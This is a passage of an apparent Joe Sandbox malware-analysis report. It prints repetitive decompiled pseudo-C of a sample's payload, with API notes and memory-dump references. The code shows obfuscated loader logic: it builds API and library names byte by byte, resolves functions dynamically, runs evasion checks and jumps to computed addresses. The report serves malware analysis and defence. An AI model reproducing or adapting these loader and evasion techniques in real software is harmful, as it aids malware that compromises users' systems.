    						_t23 = E00401CAE(_t22); // executed
    						__eflags = _t23;
    						if(_t23 != 0) {
    							goto L18;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t26 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t55 - 4)) = _t26;
    						_push(_t26);
    						__eflags = _t26;
    						if(_t26 == 0) {
    							goto L18;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t27 = E00402E18(_t26); // executed
    						_push("true");
    						 *_t57 =  *_t57 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t28 = E00402BB3(_t27); // executed
    						__eflags = _t28;
    						if(_t28 != 0) {
    							goto L18;
    						}
    						_push(0x1e);
    						do {
    							_t30 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t57 =  *_t57 - 1;
    							__eflags =  *_t57;
    						} while ( *_t57 != 0);
    						_t57 = _t57 + 4;
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t30); // executed
    						_pop(_t49);
    						 *_t57 =  *_t57 +  *((intOrPtr*)(_t49 + 0x3c));
    						_t53 = _t49;
    						 *0x405002 = _t53 + 0xa4;
    						_t32 =  *0x405002;
    						_t33 =  *_t32;
    						 *0x405002 = _t33;
    						__eflags =  *0x405002 - 0xfff;
    						if(__eflags > 0) {
    							goto L18;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(__eflags < 0) {
    							goto L18;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t38);
    						 *0x40501a =  *0x40501a + _t38;
    						__eflags =  *((intOrPtr*)(_t55 - 4)) - 0xffffffff;
    						if( *((intOrPtr*)(_t55 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							_t15 =  *0x40501a; // 0x0
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    					_push( *0x4050cf);
    					_t40 = E00402AD0(_t17);
    					_push(0xf);
    					 *_t57 =  *_t57 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz");
    					_t17 = E00402BB3(_t40);
    					__eflags = _t17;
    					if(_t17 != 0) {
    						goto L3;
    					}
    					_push("zzdjjqpqaxlgt");
    					E00402E18(_t17);
    					_push(E00401CB5);
    					return E00401CB5;
    				} else {
    					_push(1);
    					 *_t57 =  *_t57 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf");
    					if(_t15 != 0) {
    						goto L15;
    					} else {
    						_push("zzdjjqpqaxlgt");
    						E00402E18(_t15);
    						_push(0x401e1e);
    						return 0x401e1e;
    					}
    				}
			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 47%
    			E00401AD4(signed int __eax, void* __ebx) {
    				void* _t13;
    				intOrPtr _t15;
    				struct HINSTANCE__* _t19;
    				intOrPtr _t20;
    				struct HINSTANCE__* _t23;
    				void* _t24;
    				intOrPtr _t25;
    				long _t27;
    				intOrPtr* _t29;
    				intOrPtr _t30;
    				void* _t35;
    				void* _t38;
    				intOrPtr* _t42;
    				void* _t46;
    				void* _t50;
    				void* _t52;
    				intOrPtr* _t54;
    
    				_t13 = E00402AD0(__eax ^ 0x004050cf);
    				_push(1);
    				 *_t54 =  *_t54 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t13) != 0) {
    					L6:
    					_push(1);
    					 *_t54 =  *_t54 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t15 = E00401CAE(_t14); // executed
    					__eflags = _t15;
    					if(_t15 != 0) {
    						L18:
    						L19:
    						goto L19;
    					}
    					__eflags = _t52 - 0xfd00;
    					if(_t52 < 0xfd00) {
    						goto L18;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t19 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t19;
    					_t42 = "pejpCreate";
    					 *_t42 = 0x70616548;
    					 *((short*)(_t42 + 4)) = 0x7243;
    					 *((short*)(_t42 + 6)) = 0x6165;
    					_push(_t42);
    					_push(_t19);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t19);
    					_push(1);
    					 *_t54 =  *_t54 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t20 = E00401CAE(_t19); // executed
    					__eflags = _t20;
    					if(_t20 != 0) {
    						goto L18;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t23 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t52 - 4)) = _t23;
    					_push(_t23);
    					__eflags = _t23;
    					if(_t23 == 0) {
    						goto L18;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t24 = E00402E18(_t23); // executed
    					_push("true");
    					 *_t54 =  *_t54 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t25 = E00402BB3(_t24); // executed
    					__eflags = _t25;
    					if(_t25 != 0) {
    						goto L18;
    					}
    					_push(0x1e);
    					do {
    						_t27 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t54 =  *_t54 - 1;
    						__eflags =  *_t54;
    					} while ( *_t54 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t27); // executed
    					_pop(_t46);
    					 *((intOrPtr*)(_t54 + 4)) =  *((intOrPtr*)(_t54 + 4)) +  *((intOrPtr*)(_t46 + 0x3c));
    					_t50 = _t46;
    					 *0x405002 = _t50 + 0xa4;
    					_t29 =  *0x405002;
    					_t30 =  *_t29;
    					 *0x405002 = _t30;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L18;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L18;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t35);
    					 *0x40501a =  *0x40501a + _t35;
    					__eflags =  *((intOrPtr*)(_t52 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t52 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push(0xf);
    				 *_t54 =  *_t54 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t14 != 0) {
    					goto L6;
    				}
    				_push( *0x4050cf);
    				_t38 = E00402AD0(_t14);
    				_push(1);
    				 *_t54 =  *_t54 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t38) != 0) {
    					goto L6;
    				}
    				_push(0xf);
    				 *_t54 =  *_t54 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t14 != 0) {
    					goto L6;
    				}
    				_push(0xf);
    				 *_t54 =  *_t54 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t14 != 0) {
    					goto L6;
    				}
    				_push(E00402749);
    				return E00402749;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 46%
    			E00402CDE() {
    				void* _t11;
    				void* _t13;
    				struct HINSTANCE__* _t17;
    				void* _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				void* _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				intOrPtr* _t36;
    				void* _t40;
    				void* _t44;
    				void* _t46;
    				intOrPtr* _t48;
    				void* _t58;
    
    				_push(0xf);
    				 *_t48 =  *_t48 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t11) != 0) {
    					L1:
    					_push(1);
    					 *_t48 =  *_t48 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					if(_t13 != 0 || _t46 < 0xfd00) {
    						L13:
    						L14:
    						goto L14;
    					} else {
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t17 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t17;
    						_t36 = "pejpCreate";
    						 *_t36 = 0x70616548;
    						 *((short*)(_t36 + 4)) = 0x7243;
    						 *((short*)(_t36 + 6)) = 0x6165;
    						_push(_t36);
    						_push(_t17);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t17);
    						_push(1);
    						 *_t48 =  *_t48 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t18 = E00401CAE(_t17); // executed
    						if(_t18 != 0) {
    							goto L13;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t46 - 4)) = _t21;
    						_push(_t21);
    						if(_t21 == 0) {
    							goto L13;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t22 = E00402E18(_t21); // executed
    						_push("true");
    						 *_t48 =  *_t48 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t23 = E00402BB3(_t22); // executed
    						if(_t23 != 0) {
    							goto L13;
    						}
    						_push(0x1e);
    						do {
    							_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t48 =  *_t48 - 1;
    						} while ( *_t48 != 0);
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t25); // executed
    						_pop(_t40);
    						 *((intOrPtr*)(_t48 + 4)) =  *((intOrPtr*)(_t48 + 4)) +  *((intOrPtr*)(_t40 + 0x3c));
    						_t44 = _t40;
    						 *0x405002 = _t44 + 0xa4;
    						_t27 =  *0x405002;
    						_t28 =  *_t27;
    						 *0x405002 = _t28;
    						_t58 =  *0x405002 - 0xfff;
    						if(_t58 > 0) {
    							goto L13;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(_t58 < 0) {
    							goto L13;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t33);
    						 *0x40501a =  *0x40501a + _t33;
    						if( *((intOrPtr*)(_t46 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    				}
    				_push(1);
    				 *__esp =  *__esp - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				__eax = E00401CAE(__eax);
    				if(__eax != 0) {
    					goto L1;
    				}
    				_push( *0x4050cf);
    				__eax = E00402AD0(__eax);
    				_push(0xf);
    				 *__esp =  *__esp - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				__eax = E00402BB3(__eax);
    				if(__eax != 0) {
    					goto L1;
    				}
    				_push(1);
    				 *__esp =  *__esp - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				__eax = E00401CAE(__eax);
    				if(__eax != 0) {
    					goto L1;
    				}
    				_push(1);
    				 *__esp =  *__esp - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				__eax = E00401CAE(__eax);
    				if(__eax != 0) {
    					goto L1;
    				}
    				_push( *0x4050cf);
    				__eax = 0x401ad5;
    				_push(0x401ad5);
    				return 0x401ad5;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 47%
    			E00401BF1() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				void* _t36;
    				void* _t37;
    				intOrPtr* _t39;
    				void* _t43;
    				void* _t47;
    				void* _t49;
    				intOrPtr* _t51;
    
    				_push(1);
    				 *_t51 =  *_t51 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t11) != 0) {
    					L6:
    					_push(1);
    					 *_t51 =  *_t51 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L18:
    						L19:
    						goto L19;
    					}
    					__eflags = _t49 - 0xfd00;
    					if(_t49 < 0xfd00) {
    						goto L18;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t39 = "pejpCreate";
    					 *_t39 = 0x70616548;
    					 *((short*)(_t39 + 4)) = 0x7243;
    					 *((short*)(_t39 + 6)) = 0x6165;
    					_push(_t39);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t51 =  *_t51 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L18;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t49 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L18;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t51 =  *_t51 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L18;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t51 =  *_t51 - 1;
    						__eflags =  *_t51;
    					} while ( *_t51 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t43);
    					 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t51 + 4)) +  *((intOrPtr*)(_t43 + 0x3c));
    					_t47 = _t43;
    					 *0x405002 = _t47 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L18;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L18;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t49 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t49 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push(0xf);
    				 *_t51 =  *_t51 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push( *0x4050cf);
    				_t36 = E00402AD0(_t12);
    				_push(1);
    				 *_t51 =  *_t51 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t36) != 0) {
    					goto L6;
    				}
    				_push(0xf);
    				 *_t51 =  *_t51 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push( *0x4050cf);
    				_t37 = E00402AD0(_t12);
    				_push(0xf);
    				 *_t51 =  *_t51 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t37) != 0) {
    					goto L6;
    				}
    				_push(E00402749);
    				return E00402749;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 45%
    			E00401811() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				intOrPtr* _t38;
    				void* _t42;
    				void* _t46;
    				void* _t48;
    				intOrPtr* _t50;
    
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t11) != 0) {
    					L6:
    					_push(1);
    					 *_t50 =  *_t50 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L18:
    						L19:
    						goto L19;
    					}
    					__eflags = _t48 - 0xfd00;
    					if(_t48 < 0xfd00) {
    						goto L18;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t38 = "pejpCreate";
    					 *_t38 = 0x70616548;
    					 *((short*)(_t38 + 4)) = 0x7243;
    					 *((short*)(_t38 + 6)) = 0x6165;
    					_push(_t38);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t50 =  *_t50 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L18;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t48 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L18;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t50 =  *_t50 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L18;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t50 =  *_t50 - 1;
    						__eflags =  *_t50;
    					} while ( *_t50 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t42);
    					 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) +  *((intOrPtr*)(_t42 + 0x3c));
    					_t46 = _t42;
    					 *0x405002 = _t46 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L18;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L18;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t48 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t48 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push(1);
    				 *_t50 =  *_t50 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push(1);
    				 *_t50 =  *_t50 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push("zzdjjqpqaxlgt");
    				E00402E18(_t12);
    				_push(E00402749);
    				return E00402749;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 45%
    			E004014A8() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				intOrPtr* _t38;
    				void* _t42;
    				void* _t46;
    				void* _t48;
    				intOrPtr* _t50;
    
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t11) != 0) {
    					L6:
    					_push(1);
    					 *_t50 =  *_t50 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L18:
    						L19:
    						goto L19;
    					}
    					__eflags = _t48 - 0xfd00;
    					if(_t48 < 0xfd00) {
    						goto L18;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t38 = "pejpCreate";
    					 *_t38 = 0x70616548;
    					 *((short*)(_t38 + 4)) = 0x7243;
    					 *((short*)(_t38 + 6)) = 0x6165;
    					_push(_t38);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t50 =  *_t50 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L18;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t48 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L18;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t50 =  *_t50 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L18;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t50 =  *_t50 - 1;
    						__eflags =  *_t50;
    					} while ( *_t50 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t42);
    					 *((intOrPtr*)(_t50 + 4)) =  *((intOrPtr*)(_t50 + 4)) +  *((intOrPtr*)(_t42 + 0x3c));
    					_t46 = _t42;
    					 *0x405002 = _t46 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L18;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L18;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t48 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t48 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push(0xf);
    				 *_t50 =  *_t50 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(_t12 != 0) {
    					goto L6;
    				}
    				_push("zzdjjqpqaxlgt");
    				E00402E18(_t12);
    				_push(E00401DA1);
    				return E00401DA1;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 44%
    			E0040123E() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				intOrPtr* _t37;
    				void* _t41;
    				void* _t45;
    				void* _t47;
    				intOrPtr* _t49;
    
    				_push(0xf);
    				 *_t49 =  *_t49 - 1;
